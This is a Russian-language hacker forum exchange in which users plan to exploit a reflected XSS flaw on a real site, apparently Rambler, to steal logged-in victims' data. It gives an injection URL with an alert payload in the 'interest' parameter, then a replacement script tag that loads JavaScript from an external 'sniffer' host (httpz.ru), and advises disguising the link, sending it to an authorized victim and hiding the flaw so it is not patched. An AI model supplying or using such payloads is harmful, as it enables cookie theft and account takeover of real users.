Цитата:

Сообщение от cerega1999

а какой скрипт послать что-бы жертва повелась?

Во первых не скрипт а xss а скрипт к xss дописывать..выше есть линк на тему про xss,там почитаешь,все поймешь!:hmcool:

Добавлено через 1 минуту

Цитата:

Сообщение от LogaN4ik

Значит есть xss
http://******************/?sum=56&years=6546&interest=">alert(/XSS/)

заместо скрипа алерта вставляем скрипт кражи %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>" это с здешнешго онлайн снифера,так?

http://********************/?sum=56&years=6546&interest="> после этого да? дальше маскировка и отправка жертве, которая должна быть авторизована и открывать она должна непосредственно с рамблера. Все верно?

во первых на саму xss быстренько хайд ставишь,а то прикроют!!! а вместо alert(/XSS/) пишешь %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>"